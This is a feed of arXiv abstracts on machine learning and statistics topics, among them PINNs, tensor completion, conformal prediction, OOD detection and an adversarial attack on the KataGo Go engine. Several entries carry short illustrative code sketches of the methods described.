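For reference, the Bregman divergence induced by the log-partition function $F$ of an exponential family, which the bound above controls, is

```latex
B_F(\theta, \theta') \;=\; F(\theta) - F(\theta') - \big\langle \theta - \theta',\, \nabla F(\theta') \big\rangle .
```

For a Gaussian with known unit variance, $F(\theta) = \theta^2/2$, so the divergence reduces to the squared distance $B_F(\theta,\theta') = (\theta-\theta')^2/2$ and the resulting confidence sets recover the familiar Gaussian case.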
    Spectral-Bias and Kernel-Task Alignment in Physically Informed Neural Networks. (arXiv:2307.06362v1 [stat.ML])
    Physically informed neural networks (PINNs) are a promising emerging method for solving differential equations. As in many other deep learning approaches, the choice of PINN design and training protocol requires careful craftsmanship. Here, we suggest a comprehensive theoretical framework that sheds light on this important problem. Leveraging an equivalence between infinitely over-parameterized neural networks and Gaussian process regression (GPR), we derive an integro-differential equation that governs PINN prediction in the large data-set limit -- the Neurally-Informed Equation (NIE). This equation augments the original one by a kernel term reflecting architecture choices and allows quantifying implicit bias induced by the network via a spectral decomposition of the source term in the original differential equation.
    Incomplete Utterance Rewriting as Sequential Greedy Tagging. (arXiv:2307.06337v1 [cs.LG])
The task of incomplete utterance rewriting has recently received much attention. Previous models struggled to extract information from the dialogue context, as evidenced by their low restoration scores. To address this issue, we propose a novel sequence tagging-based model, which is more adept at extracting information from context. Meanwhile, we introduce speaker-aware embedding to model speaker variation. Experiments on multiple public datasets show that our model achieves optimal results on all nine restoration scores while having other metric scores comparable to previous state-of-the-art models. Furthermore, benefiting from the model's simplicity, our approach outperforms most previous models on inference speed.
    balance -- a Python package for balancing biased data samples. (arXiv:2307.06024v2 [stat.CO] UPDATED)
    Surveys are an important research tool, providing unique measurements on subjective experiences such as sentiment and opinions that cannot be measured by other means. However, because survey data is collected from a self-selected group of participants, directly inferring insights from it to a population of interest, or training ML models on such data, can lead to erroneous estimates or under-performing models. In this paper we present balance, an open-source Python package by Meta, offering a simple workflow for analyzing and adjusting biased data samples with respect to a population of interest. The balance workflow includes three steps: understanding the initial bias in the data relative to a target we would like to infer, adjusting the data to correct for the bias by producing weights for each unit in the sample based on propensity scores, and evaluating the final biases and the variance inflation after applying the fitted weights. The package provides a simple API that can be used by researchers and data scientists from a wide range of fields on a variety of data. The paper provides the relevant context, methodological background, and presents the package's API.
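The core reweighting idea can be sketched with a simple post-stratification example (a special case of propensity-score weighting where strata are discrete). This is a generic illustration, not the balance package's API; the function name and data are invented.

```python
from collections import defaultdict

def reweighted_mean(sample, population_shares):
    """Reweight a biased sample so each stratum counts in proportion to its
    share of the target population; the unit weight is pop share / sample share.
    sample: list of (stratum, outcome); population_shares: stratum -> share."""
    counts, sums = defaultdict(int), defaultdict(float)
    for stratum, y in sample:
        counts[stratum] += 1
        sums[stratum] += y
    return sum(population_shares[s] * (sums[s] / counts[s]) for s in counts)

# "young" respondents are overrepresented 3:1 but are 50% of the population.
sample = [("young", 1.0)] * 3 + [("old", 0.0)]
naive = sum(y for _, y in sample) / len(sample)            # biased upward
est = reweighted_mean(sample, {"young": 0.5, "old": 0.5})  # corrected
```

With continuous covariates, the strata are replaced by propensity scores estimated from a model, as in the package's workflow, but the weight-and-average logic is the same.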
    Tensor Completion Made Practical. (arXiv:2006.03134v2 [cs.DS] CROSS LISTED)
    Tensor completion is a natural higher-order generalization of matrix completion where the goal is to recover a low-rank tensor from sparse observations of its entries. Existing algorithms are either heuristic without provable guarantees, based on solving large semidefinite programs which are impractical to run, or make strong assumptions such as requiring the factors to be nearly orthogonal. In this paper we introduce a new variant of alternating minimization, which in turn is inspired by understanding how the progress measures that guide convergence of alternating minimization in the matrix setting need to be adapted to the tensor setting. We show strong provable guarantees, including showing that our algorithm converges linearly to the true tensors even when the factors are highly correlated and can be implemented in nearly linear time. Moreover our algorithm is also highly practical and we show that we can complete third order tensors with a thousand dimensions from observing a tiny fraction of its entries. In contrast, and somewhat surprisingly, we show that the standard version of alternating minimization, without our new twist, can converge at a drastically slower rate in practice.
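Alternating minimization is easiest to see in the rank-1 matrix case, which the tensor algorithm generalizes: fix one factor, solve least squares for the other, and alternate. The sketch below is a pedagogical illustration (not the paper's tensor algorithm or its "new twist"), with invented names and a tiny hand-made example.

```python
def als_rank1(obs, n_rows, n_cols, iters=50):
    """Recover M = u v^T from observed entries by alternating least squares.
    obs: dict {(i, j): value} of observed entries."""
    u = [1.0] * n_rows
    v = [1.0] * n_cols
    for _ in range(iters):
        for i in range(n_rows):  # solve for u[i] with v fixed
            num = sum(val * v[j] for (r, j), val in obs.items() if r == i)
            den = sum(v[j] ** 2 for (r, j) in obs if r == i)
            if den:
                u[i] = num / den
        for j in range(n_cols):  # solve for v[j] with u fixed
            num = sum(val * u[i] for (i, c), val in obs.items() if c == j)
            den = sum(u[i] ** 2 for (i, c) in obs if c == j)
            if den:
                v[j] = num / den
    return u, v

# Ground truth u = [1, 2, 3], v = [1, 2]; observe 4 of the 6 entries.
obs = {(0, 0): 1.0, (0, 1): 2.0, (1, 0): 2.0, (2, 1): 6.0}
u, v = als_rank1(obs, 3, 2)
missing = u[1] * v[1]  # entry (1, 1), never observed; its true value is 4
```

In the tensor setting the same alternation runs over three (or more) factor matrices, and the paper's contribution is a modification that keeps convergence fast even when factors are highly correlated.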
    Emergent Neural Network Mechanisms for Generalization to Objects in Novel Orientations. (arXiv:2109.13445v2 [cs.CV] UPDATED)
    The capability of Deep Neural Networks (DNNs) to recognize objects in orientations outside the distribution of the training data is not well understood. We present evidence that DNNs are capable of generalizing to objects in novel orientations by disseminating orientation-invariance obtained from familiar objects seen from many viewpoints. This capability strengthens when training the DNN with an increasing number of familiar objects, but only in orientations that involve 2D rotations of familiar orientations. We show that this dissemination is achieved via neurons tuned to common features between familiar and unfamiliar objects. These results implicate brain-like neural mechanisms for generalization.
    Bayesian taut splines for estimating the number of modes. (arXiv:2307.05825v1 [stat.ME] CROSS LISTED)
    The number of modes in a probability density function is representative of the model's complexity and can also be viewed as the number of existing subpopulations. Despite its relevance, little research has been devoted to its estimation. Focusing on the univariate setting, we propose a novel approach targeting prediction accuracy inspired by some overlooked aspects of the problem. We argue for the need for structure in the solutions, the subjective and uncertain nature of modes, and the convenience of a holistic view blending global and local density properties. Our method builds upon a combination of flexible kernel estimators and parsimonious compositional splines. Feature exploration, model selection and mode testing are implemented in the Bayesian inference paradigm, providing soft solutions and allowing to incorporate expert judgement in the process. The usefulness of our proposal is illustrated through a case study in sports analytics, showcasing multiple companion visualisation tools. A thorough simulation study demonstrates that traditional modality-driven approaches paradoxically struggle to provide accurate results. In this context, our method emerges as a top-tier alternative offering innovative solutions for analysts.
    Towards Learning to Imitate from a Single Video Demonstration. (arXiv:1901.07186v4 [cs.LG] UPDATED)
    Agents that can learn to imitate given video observation -- \emph{without direct access to state or action information} -- are more applicable to learning in the natural world. However, formulating a reinforcement learning (RL) agent that facilitates this goal remains a significant challenge. We approach this challenge using contrastive training to learn a reward function comparing an agent's behaviour with a single demonstration. We use a Siamese recurrent neural network architecture to learn rewards in space and time between motion clips while training an RL policy to minimize this distance. Through experimentation, we also find that the inclusion of multi-task data and additional image encoding losses improves the temporal consistency of the learned rewards and, as a result, significantly improves policy learning. We demonstrate our approach on simulated humanoid, dog, and raptor agents in 2D and a quadruped and a humanoid in 3D. We show that our method outperforms current state-of-the-art techniques in these environments and can learn to imitate from a single video demonstration.
    Accelerated stochastic approximation with state-dependent noise. (arXiv:2307.01497v2 [math.OC] UPDATED)
    We consider a class of stochastic smooth convex optimization problems under rather general assumptions on the noise in the stochastic gradient observation. As opposed to the classical problem setting in which the variance of noise is assumed to be uniformly bounded, herein we assume that the variance of stochastic gradients is related to the "sub-optimality" of the approximate solutions delivered by the algorithm. Such problems naturally arise in a variety of applications, in particular, in the well-known generalized linear regression problem in statistics. However, to the best of our knowledge, none of the existing stochastic approximation algorithms for solving this class of problems attain optimality in terms of the dependence on accuracy, problem parameters, and mini-batch size. We discuss two non-Euclidean accelerated stochastic approximation routines--stochastic accelerated gradient descent (SAGD) and stochastic gradient extrapolation (SGE)--which carry a particular duality relationship. We show that both SAGD and SGE, under appropriate conditions, achieve the optimal convergence rate, attaining the optimal iteration and sample complexities simultaneously. However, corresponding assumptions for the SGE algorithm are more general; they allow, for instance, for efficient application of the SGE to statistical estimation problems under heavy tail noises and discontinuous score functions. We also discuss the application of the SGE to problems satisfying quadratic growth conditions, and show how it can be used to recover sparse solutions. Finally, we report on some simulation experiments to illustrate numerical performance of our proposed algorithms in high-dimensional settings.
    Cramer Type Distances for Learning Gaussian Mixture Models by Gradient Descent. (arXiv:2307.06753v1 [cs.LG])
    The learning of Gaussian Mixture Models (also referred to simply as GMMs) plays an important role in machine learning. Known for their expressiveness and interpretability, Gaussian mixture models have a wide range of applications, from statistics and computer vision to distributional reinforcement learning. However, as of today, few known algorithms can fit or learn these models, some of which include Expectation-Maximization algorithms and Sliced Wasserstein Distance. Even fewer algorithms are compatible with gradient descent, the common learning process for neural networks. In this paper, we derive a closed formula for the distance between two GMMs in the univariate case, then propose a distance function called Sliced Cram\'er 2-distance for learning general multivariate GMMs. Our approach has several advantages over many previous methods. First, it has a closed-form expression for the univariate case and is easy to compute and implement using common machine learning libraries (e.g., PyTorch and TensorFlow). Second, it is compatible with gradient descent, which enables us to integrate GMMs with neural networks seamlessly. Third, it can fit a GMM not only to a set of data points, but also to another GMM directly, without sampling from the target model. And fourth, it has some theoretical guarantees like global gradient boundedness and unbiased sampling gradient. These features are especially useful for distributional reinforcement learning and Deep Q Networks, where the goal is to learn a distribution over future rewards. We also construct a Gaussian Mixture Distributional Deep Q Network as a toy example to demonstrate its effectiveness. Compared with previous models, this model is parameter efficient in terms of representing a distribution and possesses better interpretability.
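    For intuition, the squared Cramér 2-distance between two univariate distributions is the integral of the squared difference of their CDFs. The paper derives a closed form for mixtures; the grid integration below is only a numerical stand-in for sanity-checking values, and all parameters are illustrative:

```python
import math

def gmm_cdf(x, weights, means, stds):
    # CDF of a univariate Gaussian mixture at point x
    return sum(w * 0.5 * (1.0 + math.erf((x - m) / (s * math.sqrt(2.0))))
               for w, m, s in zip(weights, means, stds))

def cramer2_sq(p, q, lo=-10.0, hi=10.0, n=2000):
    # Squared Cramer 2-distance: integral of (F_p - F_q)^2 dx,
    # approximated by midpoint quadrature on [lo, hi]
    dx = (hi - lo) / n
    total = 0.0
    for i in range(n):
        x = lo + (i + 0.5) * dx
        total += (gmm_cdf(x, *p) - gmm_cdf(x, *q)) ** 2 * dx
    return total

bimodal = ([0.5, 0.5], [-2.0, 2.0], [1.0, 1.0])
normal = ([1.0], [0.0], [1.0])
```

    The sliced multivariate extension in the paper reduces the general case to many such univariate comparisons along random projection directions.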
    On the Validity of Conformal Prediction for Network Data Under Non-Uniform Sampling. (arXiv:2306.07252v4 [math.ST] UPDATED)
    We study the properties of conformal prediction for network data under various sampling mechanisms that commonly arise in practice but often result in a non-representative sample of nodes. We interpret these sampling mechanisms as selection rules applied to a superpopulation and study the validity of conformal prediction conditional on an appropriate selection event. We show that the sampled subarray is exchangeable conditional on the selection event if the selection rule satisfies a permutation invariance property and a joint exchangeability condition holds for the superpopulation. Our result implies the finite-sample validity of conformal prediction for certain selection events related to ego networks and snowball sampling. We also show that when data are sampled via a random walk on a graph, a variant of weighted conformal prediction yields asymptotically valid prediction sets for an independently selected node from the population.
    Learning Graph ARMA Processes from Time-Vertex Spectra. (arXiv:2302.06887v2 [stat.ML] UPDATED)
    The modeling of time-varying graph signals as stationary time-vertex stochastic processes permits the inference of missing signal values by efficiently employing the correlation patterns of the process across different graph nodes and time instants. In this study, we propose an algorithm for computing graph autoregressive moving average (graph ARMA) processes based on learning the joint time-vertex power spectral density of the process from its incomplete realizations for the task of signal interpolation. Our solution relies on first roughly estimating the joint spectrum of the process from partially observed realizations and then refining this estimate by projecting it onto the spectrum manifold of the graph ARMA process through convex relaxations. The initially missing signal values are then estimated based on the learnt model. Experimental results show that the proposed approach achieves high accuracy in time-vertex signal estimation problems.
    An Improved Uniform Convergence Bound with Fat-Shattering Dimension. (arXiv:2307.06644v1 [cs.LG])
    The fat-shattering dimension characterizes the uniform convergence property of real-valued functions. The state-of-the-art upper bounds feature a multiplicative squared logarithmic factor on the sample complexity, leaving an open gap with the existing lower bound. We provide an improved uniform convergence bound that closes this gap.
    Spectral-Bias and Kernel-Task Alignment in Physically Informed Neural Networks. (arXiv:2307.06362v1 [stat.ML])
    Physically informed neural networks (PINNs) are a promising emerging method for solving differential equations. As in many other deep learning approaches, the choice of PINN design and training protocol requires careful craftsmanship. Here, we suggest a comprehensive theoretical framework that sheds light on this important problem. Leveraging an equivalence between infinitely over-parameterized neural networks and Gaussian process regression (GPR), we derive an integro-differential equation that governs PINN prediction in the large data-set limit -- the Neurally-Informed Equation (NIE). This equation augments the original one by a kernel term reflecting architecture choices and allows quantifying implicit bias induced by the network via a spectral decomposition of the source term in the original differential equation.
    Robust online active learning. (arXiv:2302.00422v5 [stat.ML] UPDATED)
    In many industrial applications, obtaining labeled observations is not straightforward as it often requires the intervention of human experts or the use of expensive testing equipment. In these circumstances, active learning can be highly beneficial in suggesting the most informative data points to be used when fitting a model. Reducing the number of observations needed for model development alleviates both the computational burden required for training and the operational expenses related to labeling. Online active learning, in particular, is useful in high-volume production processes where the decision about the acquisition of the label for a data point needs to be taken within an extremely short time frame. However, despite the recent efforts to develop online active learning strategies, the behavior of these methods in the presence of outliers has not been thoroughly examined. In this work, we investigate the performance of online active linear regression in contaminated data streams. Our study shows that the currently available query strategies are prone to sample outliers, whose inclusion in the training set eventually degrades the predictive performance of the models. To address this issue, we propose a solution that bounds the search area of a conditional D-optimal algorithm and uses a robust estimator. Our approach strikes a balance between exploring unseen regions of the input space and protecting against outliers. Through numerical simulations, we show that the proposed method is effective in improving the performance of online active learning in the presence of outliers, thus expanding the potential applications of this powerful tool.  ( 3 min )
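    As a hypothetical sketch of the kind of rule proposed (the paper's exact algorithm differs), a conditional D-optimal query criterion whose search area is bounded might look like this; `tau` and `radius` are illustrative tuning knobs:

```python
import numpy as np

def should_query(x, XtX_inv, tau, radius):
    # Bounded conditional D-optimal rule: query the label for x only if
    # (1) x lies within `radius` of the origin, which guards against
    #     sampling extreme outliers, and
    # (2) its leverage under the current design exceeds the threshold tau,
    #     i.e. it is informative for the regression fit.
    if np.linalg.norm(x) > radius:
        return False
    leverage = float(x @ XtX_inv @ x)
    return leverage > tau
```

    The two conditions encode the paper's stated trade-off: exploring unseen regions of the input space while protecting against contamination.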
    Multivariate Time Series characterization and forecasting of VoIP traffic in real mobile networks. (arXiv:2307.06645v1 [cs.NI])
    Predicting the behavior of real-time traffic (e.g., VoIP) in mobility scenarios could help the operators to better plan their network infrastructures and to optimize the allocation of resources. Accordingly, in this work the authors propose a forecasting analysis of crucial QoS/QoE descriptors (some of which neglected in the technical literature) of VoIP traffic in a real mobile environment. The problem is formulated in terms of a multivariate time series analysis. Such a formalization allows to discover and model the temporal relationships among various descriptors and to forecast their behaviors for future periods. Techniques such as Vector Autoregressive models and machine learning (deep-based and tree-based) approaches are employed and compared in terms of performance and time complexity, by reframing the multivariate time series problem into a supervised learning one. Moreover, a series of auxiliary analyses (stationarity, orthogonal impulse responses, etc.) are performed to discover the analytical structure of the time series and to provide deep insights about their relationships. The whole theoretical analysis has an experimental counterpart since a set of trials across a real-world LTE-Advanced environment has been performed to collect, post-process and analyze about 600,000 voice packets, organized per flow and differentiated per codec.  ( 2 min )
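    The reframing of a multivariate time series into a supervised learning problem is mechanical: stack the previous `lags` observations as the feature vector and predict the next observation. A generic sketch, not the authors' exact pipeline:

```python
def make_supervised(series, lags):
    # series: list of observation vectors over time.
    # Returns (X, y): X[t] holds the `lags` previous observations
    # flattened (most recent first), y[t] the observation to predict.
    X, y = [], []
    for t in range(lags, len(series)):
        feats = [v for lag in range(1, lags + 1) for v in series[t - lag]]
        X.append(feats)
        y.append(series[t])
    return X, y
```

    The resulting (X, y) pairs can then be fed to any regressor, which is how the tree-based and deep approaches are compared against VAR models on equal footing.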
    Multiple Testing Framework for Out-of-Distribution Detection. (arXiv:2206.09522v4 [stat.ML] UPDATED)
    We study the problem of Out-of-Distribution (OOD) detection, that is, detecting whether a learning algorithm's output can be trusted at inference time. While a number of tests for OOD detection have been proposed in prior work, a formal framework for studying this problem is lacking. We propose a definition for the notion of OOD that includes both the input distribution and the learning algorithm, which provides insights for the construction of powerful tests for OOD detection. We propose a multiple hypothesis testing inspired procedure to systematically combine any number of different statistics from the learning algorithm using conformal p-values. We further provide strong guarantees on the probability of incorrectly classifying an in-distribution sample as OOD. In our experiments, we find that threshold-based tests proposed in prior work perform well in specific settings, but not uniformly well across different types of OOD instances. In contrast, our proposed method that combines multiple statistics performs uniformly well across different datasets and neural networks.  ( 2 min )
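    Two of the building blocks are simple to state in code: a conformal p-value ranks a test statistic against calibration scores, and several such p-values can be combined conservatively. Bonferroni is shown here as one standard option; the combination studied in the paper is more powerful:

```python
def conformal_pvalue(calib_scores, test_score):
    # Larger score = more OOD-like. The p-value is the (smoothed) rank of
    # the test score among the calibration scores.
    ge = sum(1 for s in calib_scores if s >= test_score)
    return (1 + ge) / (1 + len(calib_scores))

def combine_bonferroni(pvals):
    # Conservative combination of k p-values from different statistics:
    # valid whenever each individual p-value is valid.
    return min(1.0, len(pvals) * min(pvals))
```

    Flagging a sample as OOD when the combined p-value falls below a level alpha then controls the probability of incorrectly rejecting an in-distribution sample.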
    Adversarial Policies Beat Superhuman Go AIs. (arXiv:2211.00241v4 [cs.LG] UPDATED)
    We attack the state-of-the-art Go-playing AI system KataGo by training adversarial policies against it, achieving a >97% win rate against KataGo running at superhuman settings. Our adversaries do not win by playing Go well. Instead, they trick KataGo into making serious blunders. Our attack transfers zero-shot to other superhuman Go-playing AIs, and is comprehensible to the extent that human experts can implement it without algorithmic assistance to consistently beat superhuman AIs. The core vulnerability uncovered by our attack persists even in KataGo agents adversarially trained to defend against our attack. Our results demonstrate that even superhuman AI systems may harbor surprising failure modes. Example games are available https://goattack.far.ai/.  ( 2 min )
    Deep Neural Networks for Semiparametric Frailty Models via H-likelihood. (arXiv:2307.06581v1 [stat.ML])
    For prediction of clustered time-to-event data, we propose a new deep neural network based gamma frailty model (DNN-FM). An advantage of the proposed model is that the joint maximization of the new h-likelihood provides maximum likelihood estimators for fixed parameters and best unbiased predictors for random frailties. Thus, the proposed DNN-FM is trained by using a negative profiled h-likelihood as a loss function, constructed by profiling out the non-parametric baseline hazard. Experimental studies show that the proposed method enhances the prediction performance of the existing methods. A real data analysis shows that the inclusion of subject-specific frailties helps to improve prediction of the DNN based Cox model (DNN-Cox).  ( 2 min )
    An Image-Denoising Framework Fit for Quantum Annealing via QUBO and Restricted Boltzmann Machines. (arXiv:2307.06542v1 [quant-ph])
    We investigate a framework for binary image denoising via restricted Boltzmann machines (RBMs) that introduces a denoising objective in quadratic unconstrained binary optimization (QUBO) form and is well-suited for quantum annealing. The denoising objective is attained by balancing the distribution learned by a trained RBM with a penalty term for deviations from the noisy image. We derive the statistically optimal choice of the penalty parameter assuming the target distribution has been well-approximated, and further suggest an empirically supported modification to make the method robust to that idealistic assumption. We also show under additional assumptions that the denoised images attained by our method are, in expectation, strictly closer to the noise-free images than the noisy images are. While we frame the model as an image denoising model, it can be applied to any binary data. As the QUBO formulation is well-suited for implementation on quantum annealers, we test the model on a D-Wave Advantage machine, and also test on data too large for current quantum annealers by approximating QUBO solutions through classical heuristics.  ( 2 min )
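    On a toy scale the structure of the objective is easy to exhibit. Below, `Q` stands in for quadratic coefficients distilled from a trained RBM (left generic here), `lam` is the penalty parameter, and exhaustive search replaces the annealer:

```python
import itertools

def qubo_denoise(noisy, Q, lam):
    # Minimize x^T Q x + lam * sum((x_i - y_i)^2) over binary x by brute
    # force. Q encodes the learned model; the penalty term keeps the
    # denoised image x close to the noisy observation y.
    n = len(noisy)
    best_x, best_e = None, float("inf")
    for bits in itertools.product([0, 1], repeat=n):
        e = sum(Q[i][j] * bits[i] * bits[j] for i in range(n) for j in range(n))
        e += lam * sum((bits[i] - noisy[i]) ** 2 for i in range(n))
        if e < best_e:
            best_x, best_e = list(bits), e
    return best_x
```

    Since the penalty is quadratic in binary variables, the whole objective stays in QUBO form, which is what makes it directly submittable to an annealer in place of the brute-force loop.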
    A Deep Learning Method for Comparing Bayesian Hierarchical Models. (arXiv:2301.11873v3 [stat.ML] UPDATED)
    Bayesian model comparison (BMC) offers a principled approach for assessing the relative merits of competing computational models and propagating uncertainty into model selection decisions. However, BMC is often intractable for the popular class of hierarchical models due to their high-dimensional nested parameter structure. To address this intractability, we propose a deep learning method for performing BMC on any set of hierarchical models which can be instantiated as probabilistic programs. Since our method enables amortized inference, it allows efficient re-estimation of posterior model probabilities and fast performance validation prior to any real-data application. In a series of extensive validation studies, we benchmark the performance of our method against the state-of-the-art bridge sampling method and demonstrate excellent amortized inference across all BMC settings. We then showcase our method by comparing four hierarchical evidence accumulation models that have previously been deemed intractable for BMC due to partly implicit likelihoods. In this application, we corroborate evidence for the recently proposed L\'evy flight model of decision-making and show how transfer learning can be leveraged to enhance training efficiency. We provide reproducible code for all analyses and an open-source implementation of our method.  ( 2 min )
    Adapting to Mixing Time in Stochastic Optimization with Markovian Data. (arXiv:2202.04428v3 [cs.LG] UPDATED)
    We consider stochastic optimization problems where data is drawn from a Markov chain. Existing methods for this setting crucially rely on knowing the mixing time of the chain, which in real-world applications is usually unknown. We propose the first optimization method that does not require the knowledge of the mixing time, yet obtains the optimal asymptotic convergence rate when applied to convex problems. We further show that our approach can be extended to: (i) finding stationary points in non-convex optimization with Markovian data, and (ii) obtaining better dependence on the mixing time in temporal difference (TD) learning; in both cases, our method is completely oblivious to the mixing time. Our method relies on a novel combination of multi-level Monte Carlo (MLMC) gradient estimation together with an adaptive learning method.  ( 2 min )
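    A generic form of the MLMC gradient estimator (not the paper's exact construction) can be sketched as follows, where `grad_stream(n)` is assumed to return the average of `n` consecutive stochastic gradients from the chain:

```python
import random

def mlmc_gradient(grad_stream, jmax=8):
    # Multi-level Monte Carlo gradient estimate. Draw a random level
    # J ~ Geometric(1/2), so P(J = j) = 2**-j for j = 1, 2, ...
    j = 1
    while random.random() < 0.5:
        j += 1
    g = grad_stream(1)
    if j <= jmax:
        # Importance-weighted correction term at the sampled level
        g = g + (2 ** j) * (grad_stream(2 ** j) - grad_stream(2 ** (j - 1)))
    return g
```

    The geometric level makes the correction terms telescope in expectation, so the estimator is unbiased for the gradient averaged over 2**jmax consecutive samples while costing only O(jmax) samples on average, without ever needing the mixing time.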
    Learning low-rank latent mesoscale structures in networks. (arXiv:2102.06984v5 [cs.SI] UPDATED)
    It is common to use networks to encode the architecture of interactions between entities in complex systems in the physical, biological, social, and information sciences. To study the large-scale behavior of complex systems, it is useful to examine mesoscale structures in networks as building blocks that influence such behavior. We present a new approach for describing low-rank mesoscale structures in networks, and we illustrate our approach using several synthetic network models and empirical friendship, collaboration, and protein--protein interaction (PPI) networks. We find that these networks possess a relatively small number of `latent motifs' that together can successfully approximate most subgraphs of a network at a fixed mesoscale. We use an algorithm for `network dictionary learning' (NDL), which combines a network-sampling method and nonnegative matrix factorization, to learn the latent motifs of a given network. The ability to encode a network using a set of latent motifs has a wide variety of applications to network-analysis tasks, such as comparison, denoising, and edge inference. Additionally, using a new network denoising and reconstruction (NDR) algorithm, we demonstrate how to denoise a corrupted network by using only the latent motifs that one learns directly from the corrupted network.  ( 3 min )
    Deep Network Approximation: Beyond ReLU to Diverse Activation Functions. (arXiv:2307.06555v1 [cs.LG])
    This paper explores the expressive power of deep neural networks for a diverse range of activation functions. An activation function set $\mathscr{A}$ is defined to encompass the majority of commonly used activation functions, such as $\mathtt{ReLU}$, $\mathtt{LeakyReLU}$, $\mathtt{ReLU}^2$, $\mathtt{ELU}$, $\mathtt{SELU}$, $\mathtt{Softplus}$, $\mathtt{GELU}$, $\mathtt{SiLU}$, $\mathtt{Swish}$, $\mathtt{Mish}$, $\mathtt{Sigmoid}$, $\mathtt{Tanh}$, $\mathtt{Arctan}$, $\mathtt{Softsign}$, $\mathtt{dSiLU}$, and $\mathtt{SRS}$. We demonstrate that for any activation function $\varrho\in \mathscr{A}$, a $\mathtt{ReLU}$ network of width $N$ and depth $L$ can be approximated to arbitrary precision by a $\varrho$-activated network of width $6N$ and depth $2L$ on any bounded set. This finding enables the extension of most approximation results achieved with $\mathtt{ReLU}$ networks to a wide variety of other activation functions, at the cost of slightly larger constants.  ( 2 min )
    A kernel Stein test of goodness of fit for sequential models. (arXiv:2210.10741v3 [stat.ML] UPDATED)
    We propose a goodness-of-fit measure for probability densities modeling observations with varying dimensionality, such as text documents of differing lengths or variable-length sequences. The proposed measure is an instance of the kernel Stein discrepancy (KSD), which has been used to construct goodness-of-fit tests for unnormalized densities. The KSD is defined by its Stein operator: current operators used in testing apply to fixed-dimensional spaces. As our main contribution, we extend the KSD to the variable-dimension setting by identifying appropriate Stein operators, and propose a novel KSD goodness-of-fit test. As with the previous variants, the proposed KSD does not require the density to be normalized, allowing the evaluation of a large class of models. Our test is shown to perform well in practice on discrete sequential data benchmarks.  ( 2 min )
    Tensor Decompositions Meet Control Theory: Learning General Mixtures of Linear Dynamical Systems. (arXiv:2307.06538v1 [cs.LG])
    Recently Chen and Poor initiated the study of learning mixtures of linear dynamical systems. While linear dynamical systems already have wide-ranging applications in modeling time-series data, using mixture models can lead to a better fit or even a richer understanding of underlying subpopulations represented in the data. In this work we give a new approach to learning mixtures of linear dynamical systems that is based on tensor decompositions. As a result, our algorithm succeeds without strong separation conditions on the components, and can be used to compete with the Bayes optimal clustering of the trajectories. Moreover our algorithm works in the challenging partially-observed setting. Our starting point is the simple but powerful observation that the classic Ho-Kalman algorithm is a close relative of modern tensor decomposition methods for learning latent variable models. This gives us a playbook for how to extend it to work with more complicated generative models.  ( 2 min )
    A Novel Bayes' Theorem for Upper Probabilities. (arXiv:2307.06831v1 [stat.ML])
    In their seminal 1990 paper, Wasserman and Kadane establish an upper bound for the Bayes' posterior probability of a measurable set $A$, when the prior lies in a class of probability measures $\mathcal{P}$ and the likelihood is precise. They also give a sufficient condition for such upper bound to hold with equality. In this paper, we introduce a generalization of their result by additionally addressing uncertainty related to the likelihood. We give an upper bound for the posterior probability when both the prior and the likelihood belong to a set of probabilities. Furthermore, we give a sufficient condition for this upper bound to become an equality. This result is interesting on its own, and has the potential to be applied to various fields of engineering (e.g. model predictive control), machine learning, and artificial intelligence.  ( 2 min )
    The complexity of non-stationary reinforcement learning. (arXiv:2307.06877v1 [cs.LG])
    The problem of continual learning in the domain of reinforcement learning, often called non-stationary reinforcement learning, has been identified as an important challenge to the application of reinforcement learning. We prove a worst-case complexity result, which we believe captures this challenge: Modifying the probabilities or the reward of a single state-action pair in a reinforcement learning problem requires an amount of time almost as large as the number of states in order to keep the value function up to date, unless the strong exponential time hypothesis (SETH) is false; SETH is a widely accepted strengthening of the P $\neq$ NP conjecture. Recall that the number of states in current applications of reinforcement learning is typically astronomical. In contrast, we show that just $\textit{adding}$ a new state-action pair is considerably easier to implement.  ( 2 min )
    Weighted Averaged Stochastic Gradient Descent: Asymptotic Normality and Optimality. (arXiv:2307.06915v1 [stat.ML])
    Stochastic Gradient Descent (SGD) is one of the simplest and most popular algorithms in modern statistical and machine learning due to its computational and memory efficiency. Various averaging schemes have been proposed to accelerate the convergence of SGD in different settings. In this paper, we explore a general averaging scheme for SGD. Specifically, we establish the asymptotic normality of a broad range of weighted averaged SGD solutions and provide asymptotically valid online inference approaches. Furthermore, we propose an adaptive averaging scheme that exhibits both optimal statistical rate and favorable non-asymptotic convergence, drawing insights from the optimal weight for the linear model in terms of non-asymptotic mean squared error (MSE).  ( 2 min )
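    A weighted averaging scheme is cheap to maintain online. The sketch below keeps a running average of iterates with weights w_t = t**p; which weights are statistically optimal is the subject of the paper, and `p` here is just an illustrative knob:

```python
class WeightedAverager:
    # Online weighted average of SGD iterates with weights w_t = t**p.
    # p = 0 recovers plain Polyak-Ruppert averaging; larger p puts more
    # mass on recent iterates.
    def __init__(self, p=2.0):
        self.p = p
        self.t = 0
        self.wsum = 0.0
        self.avg = None

    def update(self, x):
        self.t += 1
        w = self.t ** self.p
        self.wsum += w
        if self.avg is None:
            self.avg = x
        else:
            # Incremental update: avg += (w / wsum) * (x - avg)
            self.avg = self.avg + (w / self.wsum) * (x - self.avg)
        return self.avg
```

    The incremental update means the scheme needs only O(1) extra memory per parameter, regardless of how many iterates have been averaged.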
    Robust scalable initialization for Bayesian variational inference with multi-modal Laplace approximations. (arXiv:2307.06424v1 [stat.ME])
    For predictive modeling relying on Bayesian inversion, fully independent, or ``mean-field'', Gaussian distributions are often used as approximate probability density functions in variational inference since the number of variational parameters is twice the number of unknown model parameters. The resulting diagonal covariance structure coupled with unimodal behavior can be too restrictive when dealing with highly non-Gaussian behavior, including multimodality. High-fidelity surrogate posteriors in the form of Gaussian mixtures can capture any distribution to an arbitrary degree of accuracy while maintaining some analytical tractability. Variational inference with Gaussian mixtures with full-covariance structures suffers from a quadratic growth in variational parameters with the number of model parameters. Coupled with the existence of multiple local minima due to nonconvex trends in the loss functions often associated with variational inference, these challenges motivate the need for robust initialization procedures to improve the performance and scalability of variational inference with mixture models. In this work, we propose a method for constructing an initial Gaussian mixture model approximation that can be used to warm-start the iterative solvers for variational inference. The procedure begins with an optimization stage in model parameter space in which local gradient-based optimization, globalized through multistart, is used to determine a set of local maxima, which we take to approximate the mixture component centers. Around each mode, a local Gaussian approximation is constructed via the Laplace method. Finally, the mixture weights are determined through constrained least squares regression. Robustness and scalability are demonstrated using synthetic tests. The methodology is applied to an inversion problem in structural dynamics involving unknown viscous damping coefficients.  ( 3 min )
    Energy Discrepancies: A Score-Independent Loss for Energy-Based Models. (arXiv:2307.06431v1 [stat.ML])
